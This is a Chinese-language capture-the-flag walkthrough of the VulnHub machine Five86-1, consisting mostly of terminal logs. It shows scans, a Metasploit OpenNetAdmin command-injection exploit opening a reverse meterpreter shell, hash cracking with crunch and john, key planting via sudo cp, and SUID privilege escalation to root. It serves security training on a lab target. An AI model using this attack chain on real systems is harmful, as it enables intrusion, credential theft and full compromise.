Five86 1
作者:jason_huawen
靶机信息
名称:five86: 1
地址:
https://www.vulnhub.com/entry/five86-1,417/
识别目标主机IP地址
(kali㉿kali)-[~/Vulnhub/Five86_1]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
192.168.56.100 08:00:27:85:57:73 1 60 PCS Systemtechnik GmbH
192.168.56.158 08:00:27:ac:ab:f2 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机IP地址为192.168.56.158
NMAP扫描
──(kali㉿kali)-[~/Vulnhub/Five86_1]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.158 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-22 07:54 EST
Nmap scan report for localhost (192.168.56.158)
Host is up (0.000086s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 69e63cbf72f7a000f9d9f41d68e23cbd (RSA)
| 256 459ec71e9f5bd3cefc1756f2f642abdc (ECDSA)
|_ 256 ae0a9e92645f8620c41144e05832e505 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-robots.txt: 1 disallowed entry
|_/ona
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
10000/tcp open http MiniServ 1.920 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 08:00:27:AC:AB:F2 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.32 seconds
NMAP扫描结果表明目标主机有3个开放端口:22(SSH)、80(HTTP)、10000(HTTP)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Five86_1]
└─$ curl http://192.168.56.158/robots.txt
User-agent: *
Disallow: /ona
┌──(kali㉿kali)-[~/Vulnhub/Five86_1]
└─$ nikto -h http://192.168.56.158
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.158
+ Target Hostname: 192.168.56.158
+ Target Port: 80
+ Start Time: 2023-02-22 07:58:25 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Cookie ona_context_name created without the httponly flag
+ Cookie ONA_SESSION_ID created without the httponly flag
+ Entry '/ona/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8068 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2023-02-22 07:59:18 (GMT-5) (53 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/Five86_1]
└─$ nikto -h http://192.168.56.158/ona
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.158
+ Target Hostname: 192.168.56.158
+ Target Port: 80
+ Start Time: 2023-02-22 07:59:23 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie ona_context_name created without the httponly flag
+ Cookie ONA_SESSION_ID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /ona/index.php?option=search&searchword=<script>alert(document.cookie);</script>: Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2820: /ona/index.php?dir=<script>alert('Vulnerable')</script>: Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.
+ OSVDB-50552: /ona/index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>: Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /ona/index.php?action=storenew&username=<script>alert('Vulnerable')</script>: SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
+ /ona/index.php/\"><script><script>alert(document.cookie)</script><: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-50553: /ona/index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-50553: /ona/index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search: eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-38019: /ona/?mod=<script>alert(document.cookie)</script>&op=browse: Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /ona/config/: Directory indexing found.
+ /ona/config/: Configuration information may be available remotely.
+ OSVDB-25497: /ona/index.php?rep=<script>alert(document.cookie)</script>: GPhotos index.php rep Variable XSS.
+ OSVDB-12606: /ona/index.php?err=3&email=\"><script>alert(document.cookie)</script>: MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-2790: /ona/index.php?vo=\"><script>alert(document.cookie);</script>: Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /ona/images/: Directory indexing found.
+ /ona/login.php: Admin login page/section found.
+ 7916 requests: 0 error(s) and 24 item(s) reported on remote host
+ End Time: 2023-02-22 08:00:20 (GMT-5) (57 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
访问80端口,从返回页面内容看,CMS为OpenNetAdmin, 版本为18.1.1
┌──(kali㉿kali)-[~/Vulnhub/Five86_1]
└─$ searchsploit OpenNetAdmin
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution | php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit) | php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution | php/webapps/47691.sh
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
msf6 > use exploit/unix/webapp/opennetadmin_ping_cmd_injection
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > show options
Module options (exploit/unix/webapp/opennetadmin_ping_cmd_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-M
etasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /ona/login.php yes Base path
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set LHOST 192.168.56.206
LHOST => 192.168.56.206
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set LPORT 5555
LPORT => 5555
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > set RHOSTS 192.168.56.158
RHOSTS => 192.168.56.158
msf6 exploit(unix/webapp/opennetadmin_ping_cmd_injection) > run
[*] Started reverse TCP handler on 192.168.56.206:5555
[*] Exploiting...
[*] Sending stage (1017704 bytes) to 192.168.56.158
[*] Meterpreter session 1 opened (192.168.56.206:5555 -> 192.168.56.158:43918) at 2023-02-22 08:05:13 -0500
id
[*] Command Stager progress - 100.00% done (706/706 bytes)
meterpreter > id
[-] Unknown command: id
meterpreter > shell
Process 1701 created.
Channel 1 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@five86-1:/opt/ona/www$
www-data@five86-1:~$ cat .htpasswd
cat .htpasswd
douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1
# To make things slightly less painful (a standard dictionary will likely fail),
# use the following character set for this 10 character password: aefhrt
www-data@five86-1:~$
提权
.htpasswd文件提示密码为10位,由aefhrt字符组成
┌──(kali㉿kali)-[~/Vulnhub/Five86_1]
└─$ crunch 10 10 aefhrt -o dict
Crunch will now generate the following amount of data: 665127936 bytes
634 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 60466176
crunch: 100% completed generating output
┌──(kali㉿kali)-[~/Vulnhub/Five86_1]
└─$ john --wordlist=dict hashes
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
fatherrrrr (douglas)
1g 0:00:01:33 DONE (2023-02-22 08:17) 0.01072g/s 232804p/s 232804c/s 232804C/s fatherraaa..fatherrtet
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
www-data@five86-1:~$ su - douglas
su - douglas
Password: fatherrrrr
douglas@five86-1:~$ id
id
uid=1005(douglas) gid=1005(douglas) groups=1005(douglas)
douglas@five86-1:~$ sudo -l
sudo -l
Matching Defaults entries for douglas on five86-1:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User douglas may run the following commands on five86-1:
(jen) NOPASSWD: /bin/cp
在里面发现了id_rsa和id_rsa.pub两个文件,那么把它cp到jen目录下就可以使用ssh公匙免密登录jen了
douglas@five86-1:~/.ssh$ ls -alh
ls -alh
total 16K
drwx------ 2 douglas douglas 4.0K Jan 1 2020 .
drwx------ 3 douglas douglas 4.0K Jan 1 2020 ..
-rw------- 1 douglas douglas 1.8K Jan 1 2020 id_rsa
-rw-r--r-- 1 douglas douglas 398 Jan 1 2020 id_rsa.pub
douglas@five86-1:~/.ssh$ cp id_rsa.pub /tmp/authorized_keys
cp id_rsa.pub /tmp/authorized_keys
douglas@five86-1:~/.ssh$ chmod 777 /tmp/authorized_keys
chmod 777 /tmp/authorized_keys
douglas@five86-1:~/.ssh$ sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh/
<-u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh/
douglas@five86-1:~/.ssh$ ssh [email protected]
ssh [email protected]
The authenticity of host '192.168.56.158 (192.168.56.158)' can't be established.
ECDSA key fingerprint is SHA256:aE9ZqWXrvGgzgM21BjQ23GmxQVBeD5CZw0nUq8P8RyM.
Are you sure you want to continue connecting (yes/no)? yes
yes
Warning: Permanently added '192.168.56.158' (ECDSA) to the list of known hosts.
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
jen@five86-1:~$ id
id
uid=1003(jen) gid=1003(jen) groups=1003(jen)
提示jen有一封新邮件
From: Roy Trenneman <roy@five86-1>
Date: Wed, 01 Jan 2020 03:17:00 -0500
Hi Jen,
As you know, I'll be on the "customer service" course on Monday due to that inci
dent on Level 4 with the accounts people.
But anyway, I had to change Moss's password earlier today, so when Moss is back
on Monday morning, can you let him know that his password is now Fire!Fire!
Moss will understand (ha ha ha ha).
这封邮件给与我们提示:moss用户的密码是Fire!Fire!
这样Ssh到moss用户
┌──(kali㉿kali)-[~/Vulnhub/Five86_1]
└─$ ssh [email protected]
The authenticity of host '192.168.56.158 (192.168.56.158)' can't be established.
ED25519 key fingerprint is SHA256:c8HTcx7tPvrbA31UeXE5fRobpanfPTTHV85muCC7LpI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.158' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
moss@five86-1:~$ id
uid=1001(moss) gid=1001(moss) groups=1001(moss)
moss@five86-1:~$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for moss:
Sorry, user moss may not run sudo on five86-1.
moss@five86-1:~$ ls -alh
total 12K
drwx------ 3 moss moss 4.0K Jan 1 2020 .
drwxr-xr-x 7 root root 4.0K Jan 1 2020 ..
lrwxrwxrwx 1 moss moss 9 Jan 1 2020 .bash_history -> /dev/null
drwx------ 2 moss moss 4.0K Jan 1 2020 .games
moss@five86-1:~$ cd .games
moss@five86-1:~/.games$ ls -alh
total 28K
drwx------ 2 moss moss 4.0K Jan 1 2020 .
drwx------ 3 moss moss 4.0K Jan 1 2020 ..
lrwxrwxrwx 1 moss moss 21 Jan 1 2020 battlestar -> /usr/games/battlestar
lrwxrwxrwx 1 moss moss 14 Jan 1 2020 bcd -> /usr/games/bcd
lrwxrwxrwx 1 moss moss 21 Jan 1 2020 bombardier -> /usr/games/bombardier
lrwxrwxrwx 1 moss moss 17 Jan 1 2020 empire -> /usr/games/empire
lrwxrwxrwx 1 moss moss 20 Jan 1 2020 freesweep -> /usr/games/freesweep
lrwxrwxrwx 1 moss moss 15 Jan 1 2020 hunt -> /usr/games/hunt
lrwxrwxrwx 1 moss moss 20 Jan 1 2020 ninvaders -> /usr/games/ninvaders
lrwxrwxrwx 1 moss moss 17 Jan 1 2020 nsnake -> /usr/games/nsnake
lrwxrwxrwx 1 moss moss 25 Jan 1 2020 pacman4console -> /usr/games/pacman4console
lrwxrwxrwx 1 moss moss 17 Jan 1 2020 petris -> /usr/games/petris
lrwxrwxrwx 1 moss moss 16 Jan 1 2020 snake -> /usr/games/snake
lrwxrwxrwx 1 moss moss 17 Jan 1 2020 sudoku -> /usr/games/sudoku
-rwsr-xr-x 1 root root 17K Jan 1 2020 upyourgame
lrwxrwxrwx 1 moss moss 16 Jan 1 2020 worms -> /usr/games/worms
moss@five86-1:~/.games$ cat upyourgame
ELF>�@8:@8
@@�-�=�=hp�-�=�=����DDP�td� � � <<Q�tdR�td�-�=�=▒▒/lib64/ld-linux-x86-64.so.2GNUGNU9��$�]ҘW��ǹ0#�
�
�e�mk !-&C� �
4"libc.so.6setuid__isoc99_scanfputsprintfsystem__cxa_finalize__libc_start_mainGLIBC_2.7GLIBC_2.2.5_ITM_deregisteUu▒ilone_�p�0HH@�?�?�?��?___ITM_registerTMCloneTableii
�H�=��&/�DH�=�/H��/H9�tH��.H��t������H�=Y/H�5R/H)�H��H��H��?H�H��tH��.H����fD���=/u/UH�=�.H��tf�1�I��^H��H���PTL�ZH�
H�=�.�-����h�����.]�����{���UH��H�ĀH�=�������H�U�H�E�H��H�=�������H�=������H�U�H�E�H��H�=[������H�=r��h���H�U�H�E�H��H�=.��\����U�H�E�H��H�=k��1���H�U�H�E�H��������H�=o������������H�=f���������DAWI��AVI��AUA��ATL�%0+UH�-0+SL)�H��3���H��t�L��L��D��A��H��H9�u�H�[]A\A]A^A_��H�H��Would you like to play a game? %s
Could you please repeat that?
Nope, you'll need to enter that again.
You entered: No. Is this correct?
We appear to have a problem? Do we have a problem?
Made in Britain./bin/sh<(�������������X}�����������0zRx
8���+zRx
$����`F▒J
! �?▒;*3$"D���\����&A�C
D|����]B�E▒�E �E(�H0�H8�G@j8A0A(B B▒B�����p0
�▒����80
�
▒@x�� ▒������o���o���o����o�=6FVfvH@GCC: (Debian 8.3.0-6) 8.3.0��08� 0
�
�� � 8!�=�=�=�?@▒@@P@▒��
��!07P@F�=mpy�=������<"����=��=��=�� �@�
� ▒@@5G▒P@Nbv�▒@@� �▒H@� ��]�X@��+�P@�u&▒P@ .B"crtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.7325__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entryupyourgame.c__FRAME_END____init_array_end_DYNAMIC__init_array_start__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_csu_fini_ITM_deregisterTMCloneTableputs@@GLIBC_2.2.5_edatasystem@@GLIBC_2.2.5printf@@GLIBC_2.2.5__libc_start_main@@GLIBC_2.2.5__data_start__gmon_start____dso_handle_IO_stdin_used__libc_csu_init__bss_startmain__isoc99_scanf@@GLIBC_2.7__TMC_END___ITM_registerTMCloneTablesetuid@@GLIBC_2.2.5__cxa_finalize@@GLIBC_2.2.5.symtab.strtab.shstrtab.interp.note.ABI-tag.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.got.plt.data.bss.comment�#�� 1��$D��No
▒V88�^���o��k���oz00▒�B��▒�� `���q� � �� � <�8!������=�-��?��@�@@@P@P�0P0p0`▒ �6^.9moss@five86-1:~/.games$
moss@five86-1:~/.games$ ls -alh
total 28K
drwx------ 2 moss moss 4.0K Jan 1 2020 .
drwx------ 3 moss moss 4.0K Jan 1 2020 ..
lrwxrwxrwx 1 moss moss 21 Jan 1 2020 battlestar -> /usr/games/battlestar
lrwxrwxrwx 1 moss moss 14 Jan 1 2020 bcd -> /usr/games/bcd
lrwxrwxrwx 1 moss moss 21 Jan 1 2020 bombardier -> /usr/games/bombardier
lrwxrwxrwx 1 moss moss 17 Jan 1 2020 empire -> /usr/games/empire
lrwxrwxrwx 1 moss moss 20 Jan 1 2020 freesweep -> /usr/games/freesweep
lrwxrwxrwx 1 moss moss 15 Jan 1 2020 hunt -> /usr/games/hunt
lrwxrwxrwx 1 moss moss 20 Jan 1 2020 ninvaders -> /usr/games/ninvaders
lrwxrwxrwx 1 moss moss 17 Jan 1 2020 nsnake -> /usr/games/nsnake
lrwxrwxrwx 1 moss moss 25 Jan 1 2020 pacman4console -> /usr/games/pacman4console
lrwxrwxrwx 1 moss moss 17 Jan 1 2020 petris -> /usr/games/petris
lrwxrwxrwx 1 moss moss 16 Jan 1 2020 snake -> /usr/games/snake
lrwxrwxrwx 1 moss moss 17 Jan 1 2020 sudoku -> /usr/games/sudoku
-rwsr-xr-x 1 root root 17K Jan 1 2020 upyourgame
lrwxrwxrwx 1 moss moss 16 Jan 1 2020 worms -> /usr/games/worms
moss@five86-1:~/.games$ ./upyourgame
Would you like to play a game? y
Could you please repeat that? y
Nope, you'll need to enter that again. y
You entered: No. Is this correct? Y
We appear to have a problem? Do we have a problem? n
Made in Britain.
# cd /root
# ls -alh
total 24K
drwx------ 3 root root 4.0K Jan 1 2020 .
drwxr-xr-x 18 root root 4.0K Dec 31 2019 ..
lrwxrwxrwx 1 root root 9 Dec 31 2019 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rwx------ 1 root root 33 Jan 1 2020 flag.txt
drwxr-xr-x 3 root root 4.0K Jan 1 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
# cat flag.txt
8f3b38dd95eccf600593da4522251746
#